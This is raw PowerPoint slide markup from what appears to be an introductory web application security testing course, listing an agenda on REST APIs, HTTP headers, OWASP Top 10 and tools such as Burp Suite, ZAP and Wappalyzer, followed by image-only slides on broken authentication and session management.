            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AGENDA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding client &amp; server architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding REST APIs &amp; its attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding Response code, Response description, http headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding OWASP top#10 vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analysing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security headers and vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wappalyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for understanding application framework foot print details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installing Burp Suite community edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploring Burp Suite features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploring vulnerability scanner [Burp or ZAP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing sample applications to find security vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1917146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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication &amp; Session Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CECB70B6-0BC2-4C9E-8131-C95BA2742CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114675" y="707770"/>
            <a:ext cx="5353050" cy="4095750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15510954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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication &amp; Session Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7CBAD6E4-767F-450E-BFC9-C967C84CCF2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619500" y="828960"/>
            <a:ext cx="4019550" cy="3905250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17590272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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication &amp; Session Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EA443847-97F1-4CAE-BE96-DE31EBFB5F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628900" y="667448"/>
            <a:ext cx="6534150" cy="5419725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29177896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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication &amp; Session Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3633D935-0C18-42B1-88CC-4E12DAE85193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552700" y="816928"/>
            <a:ext cx="6229350" cy="3800475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3163646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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication &amp; Session Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B313987F-3D81-4380-BC3F-DFF96704205E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1914525" y="761872"/>
            <a:ext cx="7353300" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9056643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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
